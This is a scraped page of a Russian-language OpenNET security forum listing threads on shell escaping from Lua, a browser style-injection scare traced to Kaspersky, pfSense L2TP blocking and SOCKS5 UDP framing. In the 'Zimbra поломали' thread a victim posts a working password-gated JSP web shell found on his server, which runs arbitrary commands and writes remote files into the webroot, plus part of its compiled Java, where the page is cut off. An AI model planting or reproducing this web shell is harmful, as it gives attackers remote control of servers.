The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы
правила/FAQ
поиск
регистрация
вход
слежка
RSS


Создать новую тему
- Свернуть нити
Пометить прочитанным
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Архив | Избранное | Мое | Новое | | |  
Форум Информационная безопасность
oid для IMEI, !*! йцукенфывап, (Разное / Другая система) 10-Апр-24, 10:43  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Bash экранированние, !*! LINUXORGRU, (Безопасное программирование / Linux) 15-Мрт-24, 10:08  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • gt оверквотинг удален юзай экспорт и энвирон, таблицу эскейпов я тебе не вспом, !*! Аноним (-), 12:14 , 15-Мрт-24 (1)
    >[оверквотинг удален]
    > Есть ли подвох?
    > P.S Да я знаю про пайпы просто шела
    > 
     
    > app1 | app2 
    >

    > Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
    > быть как-то в середине модифицированы (для этого lua мне и нужна)
    > вызовы через popen это просто взять данные в одном месте, обработать
    > на lua, передать дальше. И вот про это "передать" я вот
    > балакаю :)

    юзай экспорт и энвирон, таблицу эскейпов я тебе не вспомню, сам хочу запилить экранизатор, в сторону printf %q посмотри еще

    сообщить модератору +/ответить
    • Из коробки в lua нет setenv только getenv, не ну можно через luajit FFI дёрнуть,, !*! LINUXORGRU (ok), 12:59 , 15-Мрт-24 (2)
      > юзай экспорт и энвирон

      Из коробки в lua нет setenv только getenv, не ну можно через luajit FFI дёрнуть, но хочется любую луа без ограничений от 5.1 и до победного, короче без всяких особенностей.

      Но, через переменные окружения конечно в целом тоже вариант, но мне больше в данный момент интересно является ли обрамление в (плюс экранирование внутренних) одинарные кавычки плюс пробел в конце (ну или в начале или и там и там не суть) достаточным, вроде по логике да.

      1 - одинарные кавычки делают из строки реально просто строку и всё "как-есть" байтовый блоб
      2 - пробел в конце гарантированно ломает попытку шелла исполнить такое 'ls ' так как таких исполняемых файлов не существует (если не создать специально) для надёжности можно так ' ls ' если данные нужны без них можно внутри принимающей программы просто по дефолту игнорировать первый и последний символы и всё (на это я могу пойти), больше важен именно интерфейс туда/сюда, простой и надёжный как тапка.

      И всё, и вроде как все проблемы решены разом. Но вдруг и внезапно есть лазейка? Вроде как нет, но я засомневался и притопал, может кто комидорку кинет в меня и скажет "Ха смотри как можно, вот я тебя и похакал".

      сообщить модератору +/ответить
  • Строки конвертируй в hex , !*! Hello (?), 13:43 , 15-Мрт-24 (3)
    Строки конвертируй в hex.
    сообщить модератору +/ответить
  • man xargsНикогда не надо ничего дергать изнутри программы , !*! Аноним (4), 21:10 , 16-Мрт-24 (4)
    man xargs
    Никогда не надо ничего дергать изнутри программы.
    сообщить модератору +/ответить
Memory erasure in Kodachi, !*! rt000, (ПО для увеличения безопасности) 14-Апр-24, 03:15  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Понижение привилегий root с помощью file capability (CAP)., !*! Аноним, (Linux привязка / Linux) 23-Мрт-22, 17:55  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]


Запуск arch linux с включенным Secure Boot, !*! newcomer, (Безопасность системы / Linux) 13-Мрт-24, 19:10  [ | | | ] [линейный вид] [смотреть все]
Заражение браузера, в CSS прописаны 'левые сайты', !*! revun, (Блокирование спама и вирусов / Другая система) 22-Ноя-21, 14:44  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • gt оверквотинг удален Вы один пользуетесь компьютером и этой учеткой , !*! Павел Отредиез (ok), 17:02 , 22-Ноя-21 (1)
    >[оверквотинг удален]
    > Система Windows X. Проблема с заражением браузера.
    > Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и
    > "свободное плавание" в вопросе.
    > При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов
    > прописаны в теге style, а также ссылки ведущие на всякие непонятные
    > сайты.
    > при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что
    > заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не
    > выявляет источник заразы.
    > Заранее благодарен.

    Вы один пользуетесь компьютером и этой учеткой?

    сообщить модератору +/ответить
    • gt оверквотинг удален да, !*! Виталий (??), 18:53 , 22-Ноя-21 (2)
      >[оверквотинг удален]
      >> Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и
      >> "свободное плавание" в вопросе.
      >> При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов
      >> прописаны в теге style, а также ссылки ведущие на всякие непонятные
      >> сайты.
      >> при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что
      >> заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не
      >> выявляет источник заразы.
      >> Заранее благодарен.
      > Вы один пользуетесь компьютером и этой учеткой?

      да


      сообщить модератору +/ответить
  • 11 само себя не поставит Время пришло , !*! DeerFriend (?), 20:03 , 22-Ноя-21 (3)
    11 само себя не поставит. Время пришло.
    сообщить модератору +/ответить
  • Наверное X Window System X Window не связана с кодом браузеровЭмм, покажите исх, !*! ыы (?), 20:17 , 22-Ноя-21 (4)
    > Всем доброго времени суток!
    > Система Windows X. Проблема с заражением браузера.

    Наверное X Window System ?

    > При изучении кода браузеров - эдж/хром/мозила

    X Window не связана с кодом браузеров

    > обнаружил теги не присущие для сайтов

    Эмм, покажите исходник где нашли такое...

    > прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.

    Удалите их

    > при просмотре с других устройств таких паразитов не обнаруживается

    Возможно все дело в том чем вы смотрите


    сообщить модератору +/ответить
    • style type text css nonce undefined ct-bottom-ads, ct_ad, cta-ad, ctg-ad, , !*! Виталий (??), 21:33 , 22-Ноя-21 (5)
      >> Всем доброго времени суток!
      >> Система Windows X. Проблема с заражением браузера.
      > Наверное X Window System ?                                         - совершенно верно
      >> При изучении кода браузеров - эдж/хром/мозила
      > X Window не связана с кодом браузеров
      >> обнаружил теги не присущие для сайтов
      > Эмм, покажите исходник где нашли такое...                           - не нахожу здесь интерфейса для отправки исходника или прикрепления скрина, потому выкладываю как могу, извините. в элементе более 100 строк потому только частично привожу.

      <style type="text/css" nonce="undefined">.ct-bottom-ads,.ct_ad,.cta-ad,.ctg-ad,.ctips-ad-unit,.ctn-advertising,.ctnAdSkyscraper,.ctnAdSquare300,.ctn_ads_rhs,.ctn_ads_rhs_organic,.ctpl-duplicated-ad,.ctr-tss-ads,.cube-ad,.cubeAd,.cube_ad,.cube_ads,.cubead-widget,.currency_ad,.custom-ad-container,.custom-ad-one,.custom-ads,.custom-advert-banner,.custom-banner-leaderboard-ad,.customAd,.custom_ad,.custom_ads,.custom_banner_ad,.custom_footer_ad,.customadvert,.customized_ad_module,.cwAdvert,.cwv2Ads,.cxAdvertisement,.cyads650x100,.cz-sponsorposts,.d1-top-ad,.d3-c-adblock,.d499d-ads-160x90-left,.d499d-ads-160x90-right,.d499d-ads-311x300-up,.d499d-ads-635x100,.da-custom-ad-box,.da-widget,.da_adp_teaser,.dac__banner__wrapper,.dac__mpu-card,.dac__stream-mpu-card,.dart-ad,.dart-ad-content,.dart-ad-grid,.dart-ad-taboola,.dart-ad-title,.dart-advertisement,.dart-leaderboard,.dart-leaderboard-top,.dart-medsquare,.dartAd300,.dartAd491,.dartAdImage,.dart_ad,.dart_tag,.dartad,.dartadbanner,.dartadvert,.dartiframe,.datafile-ad,.datasphere-ad-front,.dc-ad,.dc-banner,.dc-half-banner,.dc-widget-adv-125,.dcAdvertHeader,.dcm-advert,.dcmads,.dd-ad,.dd-ad-container,.dda-ad,.ddb,.ddc-table-ad,.deadblocker-header-bar,.deadblocker-header-bar-inner,.deckAd,.deckads,.default-teaser__adv,.default_rc_theme,.demo-advert,.desktop-ad,.desktop-ad-banner,.desktop-ad-inpage,.desktop-ads,.desktop-advert,.desktop-article-top-ad,.desktop-aside-ad,.desktop-aside-ad-hide,.desktop-in-content-native-ad,.desktop-lazy-ads,.desktop-postcontentad-wrapper,.desktop-sidebar-ad-wrapper,.desktop-top-ad-wrapper,.desktop.ad,.desktopAd,.desktop_ad,.desktop_only_ad,.desktopads,.desktoponlyad,.detach_container__sponsor-link,.detail-ad,.detail-ads,.detailMpu,.detailSidebar-adPanel,.detail__ad--small,.detail_ad,.detail_article_ad,.detail_top_advert,.details-advert,.detectBlockBox,.detected-block-modal,.devil-ad-spot,.dex-
      ......}</style>

      Таких элементов в <head></head> 7 штук

      >> прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
      > Удалите их                                                                   - делал неоднократно, но удаление ничего не даёт, поскольку это в ситуативном окне, при обновлении браузера элементы появляются сызнова.
      >> при просмотре с других устройств таких паразитов не обнаруживается
      > Возможно все дело в том чем вы смотрите                                      - поражены мозила/эдж/опера/хром, в более экзотических браузерах этих элементов нет

      сообщить модератору +/ответить
      • Красотиша Зеленый замочек есть Создатель - круасафчег , !*! Аноним (-), 13:22 , 23-Ноя-21 (8)
        Красотиша . Зеленый замочек есть? Создатель - круасафчег.
        сообщить модератору +/ответить
      • gt оверквотинг удален А где здесь сайты , !*! Doctorrr (ok), 13:32 , 06-Дек-22 (9)
        >[оверквотинг удален]
        >> X Window не связана с кодом браузеров
        >>> обнаружил теги не присущие для сайтов
        >> Эмм, покажите исходник где нашли такое...                           - не нахожу здесь интерфейса для отправки исходника или прикрепления скрина, потому выкладываю как могу, извините. в элементе более 100 строк потому только частично привожу.
        > <style type="text/css" nonce="undefined">.ct-bottom-ads,.ct_ad,.cta-ad,.ctg-ad,.ctips-ad-unit,.ctn-advertising,.ctnAdSkyscraper,.ctnAdSquare300,.ctn_ads_rhs,.ctn_ads_rhs_organic,.ctpl-duplicated-ad,.ctr-tss-ads,.cube-ad,.cubeAd,.cube_ad,.cube_ads,.cubead-widget,.currency_ad,.custom-ad-container,.custom-ad-one,.custom-ads,.custom-advert-banner,.custom-banner-leaderboard-ad,.customAd,.custom_ad,.custom_ads,.custom_banner_ad,.custom_footer_ad,.customadvert,.customized_ad_module,.cwAdvert,.cwv2Ads,.cxAdvertisement,.cyads650x100,.cz-sponsorposts,.d1-top-ad,.d3-c-adblock,.d499d-ads-160x90-left,.d499d-ads-160x90-right,.d499d-ads-311x300-up,.d499d-ads-635x100,.da-custom-ad-box,.da-widget,.da_adp_teaser,.dac__banner__wrapper,.dac__mpu-card,.dac__stream-mpu-card,.dart-ad,.dart-ad-content,.dart-ad-grid,.dart-ad-taboola,.dart-ad-title,.dart-advertisement,.dart-leaderboard,.dart-leaderboard-top,.dart-medsquare,.dartAd300,.dartAd491,.dartAdImage,.dart_ad,.dart_tag,.dartad,.dartadbanner,.dartadvert,.dartiframe,.datafile-ad,.datasphere-ad-front,.dc-ad,.dc-banner,.dc-half-banner,.dc-widget-adv-125,.dcAdvertHeader,.dcm-advert,.dcmads,.dd-ad,.dd-ad-container,.dda-ad,.ddb,.ddc-table-ad,.deadblocker-header-bar,.deadblocker-header-bar-inner,.deckAd,.deckads,.default-teaser__adv,.default_rc_theme,.demo-advert,.desktop-ad,.desktop-ad-banner,.desktop-ad-inpage,.desktop-ads,.desktop-advert,.desktop-article-top-ad,.desktop-aside-ad,.desktop-aside-ad-hide,.desktop-in-content-native-ad,.desktop-lazy-ads,.desktop-postcontentad-wrapper,.desktop-sidebar-ad-wrapper,.desktop-top-ad-wrapper,.desktop.ad,.desktopAd,.desktop_ad,.desktop_only_ad,.desktopads,.desktoponlyad,.detach_container__sponsor-link,.detail-ad,.detail-ads,.detailMpu,.detailSidebar-adPanel,.detail__ad--small,.detail_ad,.detail_article_ad,.detail_top_advert,.details-advert,.detectBlockBox,.detected-block-modal,.devil-ad-spot,.dex-
        > ......}</style>
        > Таких элементов в <head></head> 7 штук
        >>> прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
        >> Удалите их                                                                   - делал неоднократно, но удаление ничего не даёт, поскольку это в ситуативном окне, при обновлении браузера элементы появляются сызнова.
        >>> при просмотре с других устройств таких паразитов не обнаруживается
        >> Возможно все дело в том чем вы смотрите                                      - поражены мозила/эдж/опера/хром, в более экзотических браузерах этих элементов нет

        А где здесь сайты?

        сообщить модератору +/ответить
      • Столкнулся с похожей проблемой Оказалось - это сам Касперский добавляет этот ко, !*! Ден (??), 16:13 , 01-Апр-24 (10)
        Столкнулся с похожей проблемой. Оказалось - это сам Касперский добавляет этот код на страницу. Если отключить расширение Kaspersky Protection - то все эти добавки благополучно исчезают. Писал в Kaspersky поддержку - они посоветовали в настройках Kaspersky Total Security отключить "значок шестеренки в левом нижнем углу" -> Настройки -> Настройки сети == > Внедрять в трафик скрипт взаимодействия  с веб-страницами.
        Это, конечно, отрубит и защиту, которую дает Kaspersky при просмотре сайтов, но зато не будет этих непонятных добавок. Вот жду ответа от поддержки - про то, что эти добавки вредоносные или наоборот для зашиты от вреда.

        ========================


        >[оверквотинг удален]
        >> X Window не связана с кодом браузеров
        >>> обнаружил теги не присущие для сайтов
        >> Эмм, покажите исходник где нашли такое...                           - не нахожу здесь интерфейса для отправки исходника или прикрепления скрина, потому выкладываю как могу, извините. в элементе более 100 строк потому только частично привожу.
        > <style type="text/css" nonce="undefined">.ct-bottom-ads,.ct_ad,.cta-ad,.ctg-ad,.ctips-ad-unit,.ctn-advertising,.ctnAdSkyscraper,.ctnAdSquare300,.ctn_ads_rhs,.ctn_ads_rhs_organic,.ctpl-duplicated-ad,.ctr-tss-ads,.cube-ad,.cubeAd,.cube_ad,.cube_ads,.cubead-widget,.currency_ad,.custom-ad-container,.custom-ad-one,.custom-ads,.custom-advert-banner,.custom-banner-leaderboard-ad,.customAd,.custom_ad,.custom_ads,.custom_banner_ad,.custom_footer_ad,.customadvert,.customized_ad_module,.cwAdvert,.cwv2Ads,.cxAdvertisement,.cyads650x100,.cz-sponsorposts,.d1-top-ad,.d3-c-adblock,.d499d-ads-160x90-left,.d499d-ads-160x90-right,.d499d-ads-311x300-up,.d499d-ads-635x100,.da-custom-ad-box,.da-widget,.da_adp_teaser,.dac__banner__wrapper,.dac__mpu-card,.dac__stream-mpu-card,.dart-ad,.dart-ad-content,.dart-ad-grid,.dart-ad-taboola,.dart-ad-title,.dart-advertisement,.dart-leaderboard,.dart-leaderboard-top,.dart-medsquare,.dartAd300,.dartAd491,.dartAdImage,.dart_ad,.dart_tag,.dartad,.dartadbanner,.dartadvert,.dartiframe,.datafile-ad,.datasphere-ad-front,.dc-ad,.dc-banner,.dc-half-banner,.dc-widget-adv-125,.dcAdvertHeader,.dcm-advert,.dcmads,.dd-ad,.dd-ad-container,.dda-ad,.ddb,.ddc-table-ad,.deadblocker-header-bar,.deadblocker-header-bar-inner,.deckAd,.deckads,.default-teaser__adv,.default_rc_theme,.demo-advert,.desktop-ad,.desktop-ad-banner,.desktop-ad-inpage,.desktop-ads,.desktop-advert,.desktop-article-top-ad,.desktop-aside-ad,.desktop-aside-ad-hide,.desktop-in-content-native-ad,.desktop-lazy-ads,.desktop-postcontentad-wrapper,.desktop-sidebar-ad-wrapper,.desktop-top-ad-wrapper,.desktop.ad,.desktopAd,.desktop_ad,.desktop_only_ad,.desktopads,.desktoponlyad,.detach_container__sponsor-link,.detail-ad,.detail-ads,.detailMpu,.detailSidebar-adPanel,.detail__ad--small,.detail_ad,.detail_article_ad,.detail_top_advert,.details-advert,.detectBlockBox,.detected-block-modal,.devil-ad-spot,.dex-
        > ......}</style>
        > Таких элементов в <head></head> 7 штук
        >>> прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
        >> Удалите их                                                                   - делал неоднократно, но удаление ничего не даёт, поскольку это в ситуативном окне, при обновлении браузера элементы появляются сызнова.
        >>> при просмотре с других устройств таких паразитов не обнаруживается
        >> Возможно все дело в том чем вы смотрите                                      - поражены мозила/эдж/опера/хром, в более экзотических браузерах этих элементов нет

        сообщить модератору +/ответить
pfsense, l2tp и постоянные попытки коннекта, !*! Olenevod, (Разное / FreeBSD) 15-Янв-24, 16:02  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то , !*! Ann None (?), 18:03 , 16-Янв-24 (1)
    > попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN
    > с перезапуском l2tp сервера ни к чему не привели.

    забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то?

    сообщить модератору +/ответить
    • нет, тут всё хуже, после обновления с 2 6 на 2 7 и ликвидацией DES часть клиенто, !*! Olenevod (ok), 10:07 , 17-Янв-24 (2)
      >> попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN
      >> с перезапуском l2tp сервера ни к чему не привели.
      > забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал
      > не то?

      нет, тут всё хуже, после обновления с 2.6 на 2.7 и ликвидацией DES часть клиентов перешла на чистый l2tp (рекламируют лайфхак с правкой виндового реестра и параметра prohibitipsec). Но я Блокиоровал любые udp соединения с этого адреса. И на интерфейсе IPSEC тоже блокировал.
      Сегодня ночью отключил на 5 часов l2tp сервер. И вот результаты. 1. Сменился ip с которого идут запросы, но провайдер тот же. 2. сбросился счётчик звонков. 3. В файрволле в правиле пропуска l2tp зафиксировал доступ с нового адреса. Но на этом всё.
      Простой перезапуск l2tp сервера с простоем в 5 минут не сбрасывает счётчик звонков, и в файрволле больше не появляется запись о прохождении пакетов, но в журнале l2tp они фиксируются так, как указано выше.


      сообщить модератору +/ответить
      • gt оверквотинг удален в общем, выяснил правила Pfsense действуют по умолчанию, !*! Olenevod (ok), 11:18 , 22-Янв-24 (3)
        >[оверквотинг удален]
        > DES часть клиентов перешла на чистый l2tp (рекламируют лайфхак с правкой
        > виндового реестра и параметра prohibitipsec). Но я Блокиоровал любые udp соединения
        > с этого адреса. И на интерфейсе IPSEC тоже блокировал.
        > Сегодня ночью отключил на 5 часов l2tp сервер. И вот результаты. 1.
        > Сменился ip с которого идут запросы, но провайдер тот же. 2.
        > сбросился счётчик звонков. 3. В файрволле в правиле пропуска l2tp зафиксировал
        > доступ с нового адреса. Но на этом всё.
        > Простой перезапуск l2tp сервера с простоем в 5 минут не сбрасывает счётчик
        > звонков, и в файрволле больше не появляется запись о прохождении пакетов,
        > но в журнале l2tp они фиксируются так, как указано выше.

        в общем, выяснил. правила Pfsense действуют по умолчанию на вновь устанавливаеемые соединениия. Причем, даже остановка l2tp сервера уже установленные не сбрасывает. Поэтому, вновь созданные правила на установленные соединения не действуют. Пришлось остановить l2tp сервер, найти в закладке State эти соединения, сбросить их, после чего только запретное правило начало действовать. Запустил l2tp сервер. клиент ломится, но теперь дальше фиреволла не проходит.

        сообщить модератору +/ответить
Strongswan IKEV2 не подключаются больше одного устройства сети, !*! CrowKIller, (VPN, IPSec) 20-Мрт-22, 21:38  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Настроить TLS на EXIM-е (SMTP сервере), !*! korbnik, (Шифрование, SSH, SSL / Linux) 02-Ноя-23, 12:25  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
UDP через SOCKS5, !*! WeSTMan, (Разное / Другая система) 20-Июн-20, 13:02  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, чт, !*! Аноним (1), 14:26 , 20-Июн-20 (1)
    > Подскажите, пожалуйста, что я сделал неверно

    Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, что может дать пищу для ума. Что за сервер, как именно данные отправляешь, что на сервере с файрволлом, что на клиенте с файрволлом...


    сообщить модератору +/ответить
  • зачем там 01 стоит если это начало большой датаграммы, что не влезла в один пак, !*! Аноним (2), 14:31 , 20-Июн-20 (2)
    > 1 байт - фрагмент

    зачем там 01 стоит? если это начало большой датаграммы, что не влезла в один пакет, то должен быть последующий с увеличенным номером, и финальный с >=0x80

       Поле FRAG показывает, является ли эта датаграмма самостоятельной или
       же фрагментом. Если датаграмма - фрагмент, то установленный старший
       бит является признаком последнего фрагмента, в то время как значение
       X'00' показывает, что это обычная датаграмма. Значения от 1 до 127
       обозначают на позицию фрагменте в последовательности. Каждый
       получатель будет иметь REASSEMBLY QUEUE (очередь сборки) и REASSEMBLY
       TIMER (таймер сборки) связанные с такой фрагментной датаграммой.
       Очередь сборки должна быть переинициализирована и связанные с ЙЙней
       фрагменты выкинуты всякий раз при истечении таймера сборки или
       с приходом новой датаграммы, чье значение в поле FRAG меньше,
       чем наибольшее значение поля FRAG датаграмм, обработанных
       при сборке фрагмента. Таймер сборки должен быть не менее 5 секунд.
       Приложениям рекомендуется избегать фрагментацию везде, где только
       это возможно.

       Реализация фрагментации опциональна, в реализациях где фрагментация
       не поддерживается, должны отбрасываться любые датаграммы, у которых
       поле FRAG отлично от X'00'.

    сообщить модератору +/ответить
    • gt оверквотинг удален Выставил фрагмент в 00, все заработало Спасибо Истина , !*! WeSTMan (ok), 14:55 , 20-Июн-20 (3)
      >[оверквотинг удален]
      >    с приходом новой датаграммы, чье значение в поле FRAG
      > меньше,
      >    чем наибольшее значение поля FRAG датаграмм, обработанных
      >    при сборке фрагмента. Таймер сборки должен быть не менее
      > 5 секунд.
      >    Приложениям рекомендуется избегать фрагментацию везде, где только
      >    это возможно.
      >    Реализация фрагментации опциональна, в реализациях где фрагментация
      >    не поддерживается, должны отбрасываться любые датаграммы, у которых
      >    поле FRAG отлично от X'00'.

      Выставил фрагмент в 00, все заработало. Спасибо. Истина так близко была)

      сообщить модератору +/ответить
Скрыть реальный ай-пи, !*! bp1136, (VPN, IPSec / Linux) 15-Окт-23, 11:50  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]


Exim 'бомбят', !*! Дмитрий, (Блокирование спама и вирусов) 30-Сен-23, 17:28  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Угроза принятия неверных решений от некомпетентного ИИ (AI)., !*! Аноним, (Разное / Другая система) 17-Июн-23, 07:08  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • На первые два вопроса надо было проанализировать только данный лингвистический т, !*! Аноним (1), 08:11 , 17-Июн-23 (1)
    > ... Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. ...

    На первые два вопроса надо было проанализировать только данный лингвистический текст, без применения дополнительных знаний и дать ответы "да" или "нет" основываясь только на данном тексте. ИИ неверно истолковал, не понял предложенный ему текст и дал не правильные ответы "да" или "нет"!

    На третий вопрос надо было понять что чисто лингвистического ответа в данном тексте нет. Надо было заметить геометрическую прогрессию и дать ответ основываясь на вводных данных с лингвистического текста и знаниях с алгебры о геометрической прогрессии. ИИ не смог даже понять написанный текст, провести его лингвистический разбор и даже не дошел до того места где следовало применить дополнительные знания о геометрической прогрессии. Задавал наводящие вопросы, тыкал "носом" в конкретные абзацы, ИИ просто не понимал содержание сложного текста. На третий вопрос ответа от ИИ не было и ИИ не признал свою некомпетентность в данной области!

    Может мне поисковик выдал ссылки на тупые ИИ. Может были плохие обучающие модели. Проведите свои тесты ИИ и опишите результаты. Мне ИИ не просто провалил все тесты, а давал ПРИНЦИПИАЛЬНО НЕ ПРАВИЛЬНЫЕ ответы!

    сообщить модератору +/ответить
  • g План эвакуации а-а-аЦелое исследование ни о чём, капитаните, сударь Я с чатжпт, !*! Tron is Whistling (?), 10:05 , 17-Июн-23 (2)
    g План эвакуации а-а-а

    Целое исследование ни о чём, капитаните, сударь.
    Я с чатжпт побаловался единственным вопросом - "где находится [место "на", куда посылают]".
    Оно думало полторы минуты и вывалилось с ошибкой.
    Вот и весь "лингвистический ИИ". Баловство. Даже "не знаю" не выдало.

    сообщить модератору +/ответить
  • Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог, !*! Аноним (3), 13:45 , 17-Июн-23 (3)
    Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог на основе показаний с датчиков (встроенных в эту дорогу) - это уже реализуемая история, ближайшее будущее.
    Принятие политических решений (с помощью) ИИ - совсем другое. В конце концов, ИИ выдаст какую-нибудь странную хрень типа "мыши станьте ежиками", с припиской "я стратег". И наши чиновники возьмутся заставлять народ это дело исполнять, понятное дело. Надо понимать контекст, чтобы комментировать дискуссию.

    Вопрос главный - почему занимались наноболтами в то время, когда на западе создавали сверточные сетки? Причем их создавали в том числе наши выпускники - недостатка в уровне образования не было. Сейчас в последний вагон заскакивать на хайпе не самая выигрышная стратегия.

    Да, пока Греф только планирует заменять своих банкиров на ИИ, государство уже заменило труд целой кучи людей госуслугами. И придумали эту концепцию еще в 90х, Лужков с Примаковым. Это к вопросу о внедрении вещей в госуправлении, сколько десятилетий это занимает в реальности, а не в бреду финансистов. Лет пять поснимают сливки, поколядуют на ИИ-стартапах и перейдут к новой теме.

    сообщить модератору +/ответить
Новый tcp/ip ? Кто разобрался ?, !*! Аноним, 17-Ноя-21, 20:34  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Существуют ли бесплатные wireguard сервера?, !*! anonymous, (VPN, IPSec / Linux) 30-Янв-23, 14:07  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
Шифрование разделов LUKS, !*! sheff.artx, (Шифрование, SSH, SSL) 03-Сен-23, 08:03  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
У меня отжали 2 квартиры в Москве с помощью ЭЦП, !*! Nxx, (Авторизация и аутентификация / Другая система) 16-Дек-20, 20:12  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]


Zimbra поломали, !*! BarS, (Linux привязка / Linux) 25-Янв-21, 15:43  [ | | | ] [линейный вид] [смотреть все] [раскрыть новое]
  • if G5X49Q equals request getParameter pwd String strCmd, !*! BarS (??), 15:47 , 25-Янв-21 (1)
    <%
        if("G5X49Q".equals(request.getParameter("pwd")))
        {
            String strCmd=request.getParameter("cmd");
            String strUrl=request.getParameter("url");
            String strFile=request.getParameter("file");
            if(null!=strCmd)
            {
                java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();
                int a = -1;
                byte[] b = new byte[2048];
                out.print("<pre>");
                while((a=in.read(b))!=-1)
                {
                    out.println(new String(b));
                }
                out.print("</pre>");
            }
            if(null!=strUrl&&null!=strFile)
            {
                java.io.InputStream in = new java.net.URL(strUrl).openStream();
                byte[] b = new byte[1024];
                java.io.ByteArrayOutputStream baos = new
                java.io.ByteArrayOutputStream();
                int a = -1;
                while ((a = in.read(b)) != -1)
                {
                    baos.write(b, 0, a);
                }
                new java.io.FileOutputStream(application.getRealPath("/")+"/"+strFile).write(baos.toByteArray());
            }
            out.println("MtGqKu3y");
        }
        else
        {
            //out.println("no token");
        }
    %>
    сообщить модератору +/ответить
    • Generated by the Jasper component of Apache Tomcat Version jetty 9 3 5 v, !*! BarS (??), 15:50 , 25-Янв-21 (2)
      /*
      * Generated by the Jasper component of Apache Tomcat
      * Version: jetty/9.3.5.v20151012
      * Generated at: 2019-04-02 11:49:44 UTC
      * Note: The last modified time of this file was set to
      *       the last modified time of the source file after
      *       generation to assist with modification tracking.
      */
      package org.apache.jsp.img;

      import javax.servlet.*;
      import javax.servlet.http.*;
      import javax.servlet.jsp.*;

      public final class fc47_jsp extends org.apache.jasper.runtime.HttpJspBase
          implements org.apache.jasper.runtime.JspSourceDependent,
                       org.apache.jasper.runtime.JspSourceImports {

        private static final javax.servlet.jsp.JspFactory _jspxFactory =
                javax.servlet.jsp.JspFactory.getDefaultFactory();

        private static java.util.Map<java.lang.String,java.lang.Long> _jspx_dependants;

        private static final java.util.Set<java.lang.String> _jspx_imports_packages;

        private static final java.util.Set<java.lang.String> _jspx_imports_classes;

        static {
          _jspx_imports_packages = new java.util.HashSet<>();
          _jspx_imports_packages.add("javax.servlet");
          _jspx_imports_packages.add("javax.servlet.http");
          _jspx_imports_packages.add("javax.servlet.jsp");
          _jspx_imports_classes = null;
        }

        private volatile javax.el.ExpressionFactory _el_expressionfactory;
        private volatile org.apache.tomcat.InstanceManager _jsp_instancemanager;

        public java.util.Map<java.lang.String,java.lang.Long> getDependants() {
          return _jspx_dependants;
        }

        public java.util.Set<java.lang.String> getPackageImports() {
          return _jspx_imports_packages;
        }

        public java.util.Set<java.lang.String> getClassImports() {
          return _jspx_imports_classes;
        }

        public javax.el.ExpressionFactory _jsp_getExpressionFactory() {
          if (_el_expressionfactory == null) {
            synchronized (this) {
              if (_el_expressionfactory == null) {
                _el_expressionfactory = _jspxFactory.getJspApplicationContext(getServletConfig().getServletContext()).getExpressionFactory();
              }
            }
          }
          return _el_expressionfactory;
        }

        public org.apache.tomcat.InstanceManager _jsp_getInstanceManager() {
          if (_jsp_instancemanager == null) {
            synchronized (this) {
              if (_jsp_instancemanager == null) {
                _jsp_instancemanager = org.apache.jasper.runtime.InstanceManagerFactory.getInstanceManager(getServletConfig());
              }
            }
          }
          return _jsp_instancemanager;
        }

        public void _jspInit() {
        }

        public void _jspDestroy() {
        }

        public void _jspService(final javax.servlet.http.HttpServletRequest request, final javax.servlet.http.HttpServletResponse response)
              throws java.io.IOException, javax.servlet.ServletException {

      final java.lang.String _jspx_method = request.getMethod();
      if (!"GET".equals(_jspx_method) && !"POST".equals(_jspx_method) && !"HEAD".equals(_jspx_method) && !javax.servlet.DispatcherType.ERROR.equals(request.getDispatcherType())) {
      response.sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED, "JSPs only permit GET POST or HEAD");
      return;
      }

          final javax.servlet.jsp.PageContext pageContext;
          javax.servlet.http.HttpSession session = null;
          final javax.servlet.ServletContext application;
          final javax.servlet.ServletConfig config;
          javax.servlet.jsp.JspWriter out = null;
          final java.lang.Object page = this;
          javax.servlet.jsp.JspWriter _jspx_out = null;
          javax.servlet.jsp.PageContext _jspx_page_context = null;


          try {
            response.setContentType("text/html");
            pageContext = _jspxFactory.getPageContext(this, request, response,
                        null, true, 8192, true);
